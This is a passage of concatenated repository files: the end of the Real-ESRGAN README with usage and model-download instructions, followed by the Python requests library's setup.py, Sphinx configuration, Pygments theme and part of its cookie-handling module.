1. Note that it does not support all the functions (such as `outscale`) of the Python script `inference_realesrgan.py`.

```console
Usage: realesrgan-ncnn-vulkan.exe -i infile -o outfile [options]...

  -h                   show this help
  -i input-path        input image path (jpg/png/webp) or directory
  -o output-path       output image path (jpg/png/webp) or directory
  -s scale             upscale ratio (can be 2, 3, 4. default=4)
  -t tile-size         tile size (>=32/0=auto, default=0) can be 0,0,0 for multi-gpu
  -m model-path        folder path to the pre-trained models. default=models
  -n model-name        model name (default=realesr-animevideov3, can be realesr-animevideov3 | realesrgan-x4plus | realesrgan-x4plus-anime | realesrnet-x4plus)
  -g gpu-id            gpu device to use (default=auto) can be 0,1,2 for multi-gpu
  -j load:proc:save    thread count for load/proc/save (default=1:2:2) can be 1:2,2,2:2 for multi-gpu
  -x                   enable tta mode
  -f format            output image format (jpg/png/webp, default=ext/png)
  -v                   verbose output
```

Note that it may introduce block inconsistency (and also generate slightly different results from the PyTorch implementation), because this executable file first crops the input image into several tiles, then processes them separately, and finally stitches them back together.

### Python script

#### Usage of python script

1. You can use the X4 model for **arbitrary output sizes** with the `--outscale` argument. The program will further perform a cheap resize operation after the Real-ESRGAN output. (A minimal Python sketch that drives this script programmatically appears after this README.)

```console
Usage: python inference_realesrgan.py -n RealESRGAN_x4plus -i infile -o outfile [options]...

A common command: python inference_realesrgan.py -n RealESRGAN_x4plus -i infile --outscale 3.5 --face_enhance

  -h                   show this help
  -i --input           Input image or folder. Default: inputs
  -o --output          Output folder. Default: results
  -n --model_name      Model name. Default: RealESRGAN_x4plus
  -s, --outscale       The final upsampling scale of the image. Default: 4
  --suffix             Suffix of the restored image. Default: out
  -t, --tile           Tile size, 0 for no tile during testing. Default: 0
  --face_enhance       Whether to use GFPGAN to enhance face. Default: False
  --fp32               Use fp32 precision during inference. Default: fp16 (half precision).
  --ext                Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto
```

#### Inference general images

Download pre-trained models: [RealESRGAN_x4plus.pth](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth)

```bash
wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P weights
```

Inference!

```bash
python inference_realesrgan.py -n RealESRGAN_x4plus -i inputs --face_enhance
```

Results are in the `results` folder.

#### Inference anime images

<p align="center">
  <img src="https://raw.githubusercontent.com/xinntao/public-figures/master/Real-ESRGAN/cmp_realesrgan_anime_1.png">
</p>

Pre-trained models: [RealESRGAN_x4plus_anime_6B](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth)<br>
More details and comparisons with [waifu2x](https://github.com/nihui/waifu2x-ncnn-vulkan) are in [**anime_model.md**](docs/anime_model.md)

```bash
# download model
wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P weights
# inference
python inference_realesrgan.py -n RealESRGAN_x4plus_anime_6B -i inputs
```

Results are in the `results` folder.

---

## BibTeX

    @InProceedings{wang2021realesrgan,
        author    = {Xintao Wang and Liangbin Xie and Chao Dong and Ying Shan},
        title     = {Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data},
        booktitle = {International Conference on Computer Vision Workshops (ICCVW)},
        date      = {2021}
    }

## 📧 Contact

If you have any questions, please email `[email protected]` or `[email protected]`.

<!---------------------------------- Projects that use Real-ESRGAN --------------------------->
## 🧩 Projects that use Real-ESRGAN

If you develop or use Real-ESRGAN in your projects, you are welcome to let me know.

- NCNN-Android: [RealSR-NCNN-Android](https://github.com/tumuyan/RealSR-NCNN-Android) by [tumuyan](https://github.com/tumuyan)
- VapourSynth: [vs-realesrgan](https://github.com/HolyWu/vs-realesrgan) by [HolyWu](https://github.com/HolyWu)
- NCNN: [Real-ESRGAN-ncnn-vulkan](https://github.com/xinntao/Real-ESRGAN-ncnn-vulkan)

&nbsp;&nbsp;&nbsp;&nbsp;**GUI**

- [Waifu2x-Extension-GUI](https://github.com/AaronFeng753/Waifu2x-Extension-GUI) by [AaronFeng753](https://github.com/AaronFeng753)
- [Squirrel-RIFE](https://github.com/Justin62628/Squirrel-RIFE) by [Justin62628](https://github.com/Justin62628)
- [Real-GUI](https://github.com/scifx/Real-GUI) by [scifx](https://github.com/scifx)
- [Real-ESRGAN_GUI](https://github.com/net2cn/Real-ESRGAN_GUI) by [net2cn](https://github.com/net2cn)
- [Real-ESRGAN-EGUI](https://github.com/WGzeyu/Real-ESRGAN-EGUI) by [WGzeyu](https://github.com/WGzeyu)
- [anime_upscaler](https://github.com/shangar21/anime_upscaler) by [shangar21](https://github.com/shangar21)
- [Upscayl](https://github.com/upscayl/upscayl) by [Nayam Amarshe](https://github.com/NayamAmarshe) and [TGS963](https://github.com/TGS963)

## 🤗 Acknowledgement

Thanks to all the contributors.

- [AK391](https://github.com/AK391): Integrated Real-ESRGAN into [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/Real-ESRGAN).
- [Asiimoviet](https://github.com/Asiimoviet): Translated the README.md into Chinese (中文).
- [2ji3150](https://github.com/2ji3150): Thanks for the [detailed and valuable feedback/suggestions](https://github.com/xinntao/Real-ESRGAN/issues/131).
- [Jared-02](https://github.com/Jared-02): Translated the Training.md into Chinese (中文).
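As a companion to the Python-script usage documented in the README above, here is a minimal, hedged sketch (not part of the repository) that drives `inference_realesrgan.py` from Python via `subprocess`. It assumes the repository has been set up as described in the installation section, that the command is run from the repo root, and that the `RealESRGAN_x4plus` weights have been downloaded into `weights/`; every flag used is one listed in the usage text.

```python
import subprocess

# Upscale everything in `inputs/` by 3.5x using the x4 model, tiling to limit
# GPU memory use; results land in `results/` (the script's default output folder).
cmd = [
    "python", "inference_realesrgan.py",
    "-n", "RealESRGAN_x4plus",   # model name (see the usage text above)
    "-i", "inputs",              # input image or folder
    "-o", "results",             # output folder
    "--outscale", "3.5",         # final scale; the script resizes after the x4 model
    "--tile", "256",             # tile size; 0 disables tiling
]
subprocess.run(cmd, check=True)
```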
requests
f12ccbef6d6b95564da8d22e280d28c39d53f0e9
File: setup.py #!/usr/bin/env python import os import sys from codecs import open from setuptools import setup CURRENT_PYTHON = sys.version_info[:2] REQUIRED_PYTHON = (3, 8) if CURRENT_PYTHON < REQUIRED_PYTHON: sys.stderr.write( """ ========================== Unsupported Python version ========================== This version of Requests requires at least Python {}.{}, but you're trying to install it on Python {}.{}. To resolve this, consider upgrading to a supported Python version. If you can't upgrade your Python version, you'll need to pin to an older version of Requests (<2.32.0). """.format( *(REQUIRED_PYTHON + CURRENT_PYTHON) ) ) sys.exit(1) # 'setup.py publish' shortcut. if sys.argv[-1] == "publish": os.system("python setup.py sdist bdist_wheel") os.system("twine upload dist/*") sys.exit() requires = [ "charset_normalizer>=2,<4", "idna>=2.5,<4", "urllib3>=1.21.1,<3", "certifi>=2017.4.17", ] test_requirements = [ "pytest-httpbin==2.0.0", "pytest-cov", "pytest-mock", "pytest-xdist", "PySocks>=1.5.6, !=1.5.7", "pytest>=3", ] about = {} here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, "src", "requests", "__version__.py"), "r", "utf-8") as f: exec(f.read(), about) with open("README.md", "r", "utf-8") as f: readme = f.read() setup( name=about["__title__"], version=about["__version__"], description=about["__description__"], long_description=readme, long_description_content_type="text/markdown", author=about["__author__"], author_email=about["__author_email__"], url=about["__url__"], packages=["requests"], package_data={"": ["LICENSE", "NOTICE"]}, package_dir={"": "src"}, include_package_data=True, python_requires=">=3.8", install_requires=requires, license=about["__license__"], zip_safe=False, classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Natural Language :: English", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries", ], tests_require=test_requirements, extras_require={ "security": [], "socks": ["PySocks>=1.5.6, !=1.5.7"], "use_chardet_on_py3": ["chardet>=3.0.2,<6"], }, project_urls={ "Documentation": "https://requests.readthedocs.io", "Source": "https://github.com/psf/requests", }, ) File: docs/conf.py # -*- coding: utf-8 -*- # # Requests documentation build configuration file, created by # sphinx-quickstart on Fri Feb 19 00:05:47 2016. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. 
# sys.path.insert(0, os.path.abspath('.')) # Insert Requests' path into the system. sys.path.insert(0, os.path.abspath("..")) sys.path.insert(0, os.path.abspath("_themes")) import requests # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.intersphinx", "sphinx.ext.todo", "sphinx.ext.viewcode", ] # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = ".rst" # The encoding of source files. # source_encoding = 'utf-8-sig' # The master toctree document. master_doc = "index" # General information about the project. project = u"Requests" copyright = u'MMXVIX. A <a href="https://kenreitz.org/projects">Kenneth Reitz</a> Project' author = u"Kenneth Reitz" # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = requests.__version__ # The full version, including alpha/beta/rc tags. release = requests.__version__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ["_build"] # The reST default role (used for this markup: `text`) to use for all # documents. # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. add_function_parentheses = False # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = "flask_theme_support.FlaskyStyle" # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. # keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = "alabaster" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. 
html_theme_options = { "show_powered_by": False, "github_user": "requests", "github_repo": "requests", "github_banner": True, "show_related": False, "note_bg": "#FFF59C", } # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ["_static"] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. html_use_smartypants = False # Custom sidebar templates, maps document names to template names. html_sidebars = { "index": ["sidebarintro.html", "sourcelink.html", "searchbox.html", "hacks.html"], "**": [ "sidebarlogo.html", "localtoc.html", "relations.html", "sourcelink.html", "searchbox.html", "hacks.html", ], } # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. html_show_sourcelink = False # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. html_show_sphinx = False # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' # html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value # html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. # html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. 
htmlhelp_basename = "Requestsdoc" # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, "Requests.tex", u"Requests Documentation", u"Kenneth Reitz", "manual") ] # The name of an image file (relative to this directory) to place at the top of # the title page. # latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. # latex_use_parts = False # If true, show page references after internal links. # latex_show_pagerefs = False # If true, show URL addresses after external links. # latex_show_urls = False # Documents to append as an appendix to all manuals. # latex_appendices = [] # If false, no module index is generated. # latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [(master_doc, "requests", u"Requests Documentation", [author], 1)] # If true, show URL addresses after external links. # man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( master_doc, "Requests", u"Requests Documentation", author, "Requests", "One line description of project.", "Miscellaneous", ) ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for Epub output ---------------------------------------------- # Bibliographic Dublin Core info. epub_title = project epub_author = author epub_publisher = author epub_copyright = copyright # The basename for the epub file. It defaults to the project name. # epub_basename = project # The HTML theme for the epub output. Since the default themes are not # optimized for small screen space, using the same theme for HTML and epub # output is usually not wise. This defaults to 'epub', a theme designed to save # visual space. # epub_theme = 'epub' # The language of the text. It defaults to the language option # or 'en' if the language is not set. # epub_language = '' # The scheme of the identifier. Typical schemes are ISBN or URL. # epub_scheme = '' # The unique identifier of the text. This can be a ISBN number # or the project homepage. # epub_identifier = '' # A unique identification for the text. # epub_uid = '' # A tuple containing the cover image and cover page html template filenames. # epub_cover = () # A sequence of (type, uri, title) tuples for the guide element of content.opf. # epub_guide = () # HTML files that should be inserted before the pages created by sphinx. # The format is a list of tuples containing the path and title. 
# epub_pre_files = [] # HTML files that should be inserted after the pages created by sphinx. # The format is a list of tuples containing the path and title. # epub_post_files = [] # A list of files that should not be packed into the epub file. epub_exclude_files = ["search.html"] # The depth of the table of contents in toc.ncx. # epub_tocdepth = 3 # Allow duplicate toc entries. # epub_tocdup = True # Choose between 'default' and 'includehidden'. # epub_tocscope = 'default' # Fix unsupported image types using the Pillow. # epub_fix_images = False # Scale large images. # epub_max_image_width = 0 # How to display URL addresses: 'footnote', 'no', or 'inline'. # epub_show_urls = 'inline' # If false, no index is generated. # epub_use_index = True intersphinx_mapping = { "python": ("https://docs.python.org/3/", None), "urllib3": ("https://urllib3.readthedocs.io/en/latest", None), } File: docs/_themes/flask_theme_support.py # flasky extensions. flasky pygments style based on tango style from pygments.style import Style from pygments.token import Keyword, Name, Comment, String, Error, \ Number, Operator, Generic, Whitespace, Punctuation, Other, Literal class FlaskyStyle(Style): background_color = "#f8f8f8" default_style = "" styles = { # No corresponding class for the following: #Text: "", # class: '' Whitespace: "underline #f8f8f8", # class: 'w' Error: "#a40000 border:#ef2929", # class: 'err' Other: "#000000", # class 'x' Comment: "italic #8f5902", # class: 'c' Comment.Preproc: "noitalic", # class: 'cp' Keyword: "bold #004461", # class: 'k' Keyword.Constant: "bold #004461", # class: 'kc' Keyword.Declaration: "bold #004461", # class: 'kd' Keyword.Namespace: "bold #004461", # class: 'kn' Keyword.Pseudo: "bold #004461", # class: 'kp' Keyword.Reserved: "bold #004461", # class: 'kr' Keyword.Type: "bold #004461", # class: 'kt' Operator: "#582800", # class: 'o' Operator.Word: "bold #004461", # class: 'ow' - like keywords Punctuation: "bold #000000", # class: 'p' # because special names such as Name.Class, Name.Function, etc. # are not recognized as such later in the parsing, we choose them # to look the same as ordinary variables. 
Name: "#000000", # class: 'n' Name.Attribute: "#c4a000", # class: 'na' - to be revised Name.Builtin: "#004461", # class: 'nb' Name.Builtin.Pseudo: "#3465a4", # class: 'bp' Name.Class: "#000000", # class: 'nc' - to be revised Name.Constant: "#000000", # class: 'no' - to be revised Name.Decorator: "#888", # class: 'nd' - to be revised Name.Entity: "#ce5c00", # class: 'ni' Name.Exception: "bold #cc0000", # class: 'ne' Name.Function: "#000000", # class: 'nf' Name.Property: "#000000", # class: 'py' Name.Label: "#f57900", # class: 'nl' Name.Namespace: "#000000", # class: 'nn' - to be revised Name.Other: "#000000", # class: 'nx' Name.Tag: "bold #004461", # class: 'nt' - like a keyword Name.Variable: "#000000", # class: 'nv' - to be revised Name.Variable.Class: "#000000", # class: 'vc' - to be revised Name.Variable.Global: "#000000", # class: 'vg' - to be revised Name.Variable.Instance: "#000000", # class: 'vi' - to be revised Number: "#990000", # class: 'm' Literal: "#000000", # class: 'l' Literal.Date: "#000000", # class: 'ld' String: "#4e9a06", # class: 's' String.Backtick: "#4e9a06", # class: 'sb' String.Char: "#4e9a06", # class: 'sc' String.Doc: "italic #8f5902", # class: 'sd' - like a comment String.Double: "#4e9a06", # class: 's2' String.Escape: "#4e9a06", # class: 'se' String.Heredoc: "#4e9a06", # class: 'sh' String.Interpol: "#4e9a06", # class: 'si' String.Other: "#4e9a06", # class: 'sx' String.Regex: "#4e9a06", # class: 'sr' String.Single: "#4e9a06", # class: 's1' String.Symbol: "#4e9a06", # class: 'ss' Generic: "#000000", # class: 'g' Generic.Deleted: "#a40000", # class: 'gd' Generic.Emph: "italic #000000", # class: 'ge' Generic.Error: "#ef2929", # class: 'gr' Generic.Heading: "bold #000080", # class: 'gh' Generic.Inserted: "#00A000", # class: 'gi' Generic.Output: "#888", # class: 'go' Generic.Prompt: "#745334", # class: 'gp' Generic.Strong: "bold #000000", # class: 'gs' Generic.Subheading: "bold #800080", # class: 'gu' Generic.Traceback: "bold #a40000", # class: 'gt' } File: src/requests/cookies.py """ requests.cookies ~~~~~~~~~~~~~~~~ Compatibility code to be able to use `http.cookiejar.CookieJar` with requests. requests.utils imports from here, so be careful with imports. """ import calendar import copy import time from ._internal_utils import to_native_string from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse try: import threading except ImportError: import dummy_threading as threading class MockRequest: """Wraps a `requests.Request` to mimic a `urllib2.Request`. The code in `http.cookiejar.CookieJar` expects this interface in order to correctly manage cookie policies, i.e., determine whether a cookie can be set, given the domains of the request and the cookie. The original request object is read-only. The client is responsible for collecting the new headers via `get_new_headers()` and interpreting them appropriately. You probably want `get_cookie_header`, defined below. 
""" def __init__(self, request): self._r = request self._new_headers = {} self.type = urlparse(self._r.url).scheme def get_type(self): return self.type def get_host(self): return urlparse(self._r.url).netloc def get_origin_req_host(self): return self.get_host() def get_full_url(self): # Only return the response's URL if the user hadn't set the Host # header if not self._r.headers.get("Host"): return self._r.url # If they did set it, retrieve it and reconstruct the expected domain host = to_native_string(self._r.headers["Host"], encoding="utf-8") parsed = urlparse(self._r.url) # Reconstruct the URL as we expect it return urlunparse( [ parsed.scheme, host, parsed.path, parsed.params, parsed.query, parsed.fragment, ] ) def is_unverifiable(self): return True def has_header(self, name): return name in self._r.headers or name in self._new_headers def get_header(self, name, default=None): return self._r.headers.get(name, self._new_headers.get(name, default)) def add_header(self, key, val): """cookiejar has no legitimate use for this method; add it back if you find one.""" raise NotImplementedError( "Cookie headers should be added with add_unredirected_header()" ) def add_unredirected_header(self, name, value): self._new_headers[name] = value def get_new_headers(self): return self._new_headers @property def unverifiable(self): return self.is_unverifiable() @property def origin_req_host(self): return self.get_origin_req_host() @property def host(self): return self.get_host() class MockResponse: """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`. ...what? Basically, expose the parsed HTTP headers from the server response the way `http.cookiejar` expects to see them. """ def __init__(self, headers): """Make a MockResponse for `cookiejar` to read. :param headers: a httplib.HTTPMessage or analogous carrying the headers """ self._headers = headers def info(self): return self._headers def getheaders(self, name): self._headers.getheaders(name) def extract_cookies_to_jar(jar, request, response): """Extract the cookies from the response into a CookieJar. :param jar: http.cookiejar.CookieJar (not necessarily a RequestsCookieJar) :param request: our own requests.Request object :param response: urllib3.HTTPResponse object """ if not (hasattr(response, "_original_response") and response._original_response): return # the _original_response field is the wrapped httplib.HTTPResponse object, req = MockRequest(request) # pull out the HTTPMessage with the headers and put it in the mock: res = MockResponse(response._original_response.msg) jar.extract_cookies(res, req) def get_cookie_header(jar, request): """ Produce an appropriate Cookie header string to be sent with `request`, or None. :rtype: str """ r = MockRequest(request) jar.add_cookie_header(r) return r.get_new_headers().get("Cookie") def remove_cookie_by_name(cookiejar, name, domain=None, path=None): """Unsets a cookie by name, by default over all domains and paths. Wraps CookieJar.clear(), is O(n). """ clearables = [] for cookie in cookiejar: if cookie.name != name: continue if domain is not None and domain != cookie.domain: continue if path is not None and path != cookie.path: continue clearables.append((cookie.domain, cookie.path, cookie.name)) for domain, path, name in clearables: cookiejar.clear(domain, path, name) class CookieConflictError(RuntimeError): """There are two cookies that meet the criteria specified in the cookie jar. Use .get and .set and include domain and path args in order to be more specific. 
""" class RequestsCookieJar(cookielib.CookieJar, MutableMapping): """Compatibility class; is a http.cookiejar.CookieJar, but exposes a dict interface. This is the CookieJar we create by default for requests and sessions that don't specify one, since some clients may expect response.cookies and session.cookies to support dict operations. Requests does not use the dict interface internally; it's just for compatibility with external client code. All requests code should work out of the box with externally provided instances of ``CookieJar``, e.g. ``LWPCookieJar`` and ``FileCookieJar``. Unlike a regular CookieJar, this class is pickleable. .. warning:: dictionary operations that are normally O(1) may be O(n). """ def get(self, name, default=None, domain=None, path=None): """Dict-like get() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. .. warning:: operation is O(n), not O(1). """ try: return self._find_no_duplicates(name, domain, path) except KeyError: return default def set(self, name, value, **kwargs): """Dict-like set() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. """ # support client code that unsets cookies by assignment of a None value: if value is None: remove_cookie_by_name( self, name, domain=kwargs.get("domain"), path=kwargs.get("path") ) return if isinstance(value, Morsel): c = morsel_to_cookie(value) else: c = create_cookie(name, value, **kwargs) self.set_cookie(c) return c def iterkeys(self): """Dict-like iterkeys() that returns an iterator of names of cookies from the jar. .. seealso:: itervalues() and iteritems(). """ for cookie in iter(self): yield cookie.name def keys(self): """Dict-like keys() that returns a list of names of cookies from the jar. .. seealso:: values() and items(). """ return list(self.iterkeys()) def itervalues(self): """Dict-like itervalues() that returns an iterator of values of cookies from the jar. .. seealso:: iterkeys() and iteritems(). """ for cookie in iter(self): yield cookie.value def values(self): """Dict-like values() that returns a list of values of cookies from the jar. .. seealso:: keys() and items(). """ return list(self.itervalues()) def iteritems(self): """Dict-like iteritems() that returns an iterator of name-value tuples from the jar. .. seealso:: iterkeys() and itervalues(). """ for cookie in iter(self): yield cookie.name, cookie.value def items(self): """Dict-like items() that returns a list of name-value tuples from the jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a vanilla python dict of key value pairs. .. seealso:: keys() and values(). """ return list(self.iteritems()) def list_domains(self): """Utility method to list all the domains in the jar.""" domains = [] for cookie in iter(self): if cookie.domain not in domains: domains.append(cookie.domain) return domains def list_paths(self): """Utility method to list all the paths in the jar.""" paths = [] for cookie in iter(self): if cookie.path not in paths: paths.append(cookie.path) return paths def multiple_domains(self): """Returns True if there are multiple domains in the jar. Returns False otherwise. 
:rtype: bool """ domains = [] for cookie in iter(self): if cookie.domain is not None and cookie.domain in domains: return True domains.append(cookie.domain) return False # there is only one domain in jar def get_dict(self, domain=None, path=None): """Takes as an argument an optional domain and path and returns a plain old Python dict of name-value pairs of cookies that meet the requirements. :rtype: dict """ dictionary = {} for cookie in iter(self): if (domain is None or cookie.domain == domain) and ( path is None or cookie.path == path ): dictionary[cookie.name] = cookie.value return dictionary def __contains__(self, name): try: return super().__contains__(name) except CookieConflictError: return True def __getitem__(self, name): """Dict-like __getitem__() for compatibility with client code. Throws exception if there are more than one cookie with name. In that case, use the more explicit get() method instead. .. warning:: operation is O(n), not O(1). """ return self._find_no_duplicates(name) def __setitem__(self, name, value): """Dict-like __setitem__ for compatibility with client code. Throws exception if there is already a cookie of that name in the jar. In that case, use the more explicit set() method instead. """ self.set(name, value) def __delitem__(self, name): """Deletes a cookie given a name. Wraps ``http.cookiejar.CookieJar``'s ``remove_cookie_by_name()``. """ remove_cookie_by_name(self, name) def set_cookie(self, cookie, *args, **kwargs): if ( hasattr(cookie.value, "startswith") and cookie.value.startswith('"') and cookie.value.endswith('"') ): cookie.value = cookie.value.replace('\\"', "") return super().set_cookie(cookie, *args, **kwargs) def update(self, other): """Updates this jar with cookies from another CookieJar or dict-like""" if isinstance(other, cookielib.CookieJar): for cookie in other: self.set_cookie(copy.copy(cookie)) else: super().update(other) def _find(self, name, domain=None, path=None): """Requests uses this method internally to get cookie values. If there are conflicting cookies, _find arbitrarily chooses one. See _find_no_duplicates if you want an exception thrown if there are conflicting cookies. :param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :return: cookie.value """ for cookie in iter(self): if cookie.name == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: return cookie.value raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def _find_no_duplicates(self, name, domain=None, path=None): """Both ``__get_item__`` and ``get`` call this function: it's never used elsewhere in Requests. 
:param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :raises KeyError: if cookie is not found :raises CookieConflictError: if there are multiple cookies that match name and optionally domain and path :return: cookie.value """ toReturn = None for cookie in iter(self): if cookie.name == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: if toReturn is not None: # if there are multiple cookies that meet passed in criteria raise CookieConflictError( f"There are multiple cookies with name, {name!r}" ) # we will eventually return this as long as no cookie conflict toReturn = cookie.value if toReturn: return toReturn raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def __getstate__(self): """Unlike a normal CookieJar, this class is pickleable.""" state = self.__dict__.copy() # remove the unpickleable RLock object state.pop("_cookies_lock") return state def __setstate__(self, state): """Unlike a normal CookieJar, this class is pickleable.""" self.__dict__.update(state) if "_cookies_lock" not in self.__dict__: self._cookies_lock = threading.RLock() def copy(self): """Return a copy of this RequestsCookieJar.""" new_cj = RequestsCookieJar() new_cj.set_policy(self.get_policy()) new_cj.update(self) return new_cj def get_policy(self): """Return the CookiePolicy instance used.""" return self._policy def _copy_cookie_jar(jar): if jar is None: return None if hasattr(jar, "copy"): # We're dealing with an instance of RequestsCookieJar return jar.copy() # We're dealing with a generic CookieJar instance new_jar = copy.copy(jar) new_jar.clear() for cookie in jar: new_jar.set_cookie(copy.copy(cookie)) return new_jar def create_cookie(name, value, **kwargs): """Make a cookie from underspecified parameters. By default, the pair of `name` and `value` will be set for the domain '' and sent on every request (this is sometimes called a "supercookie"). """ result = { "version": 0, "name": name, "value": value, "port": None, "domain": "", "path": "/", "secure": False, "expires": None, "discard": True, "comment": None, "comment_url": None, "rest": {"HttpOnly": None}, "rfc2109": False, } badargs = set(kwargs) - set(result) if badargs: raise TypeError( f"create_cookie() got unexpected keyword arguments: {list(badargs)}" ) result.update(kwargs) result["port_specified"] = bool(result["port"]) result["domain_specified"] = bool(result["domain"]) result["domain_initial_dot"] = result["domain"].startswith(".") result["path_specified"] = bool(result["path"]) return cookielib.Cookie(**result) def morsel_to_cookie(morsel): """Convert a Morsel object into a Cookie containing the one k/v pair.""" expires = None if morsel["max-age"]: try: expires = int(time.time() + int(morsel["max-age"])) except ValueError: raise TypeError(f"max-age: {morsel['max-age']} must be integer") elif morsel["expires"]: time_template = "%a, %d-%b-%Y %H:%M:%S GMT" expires = calendar.timegm(time.strptime(morsel["expires"], time_template)) 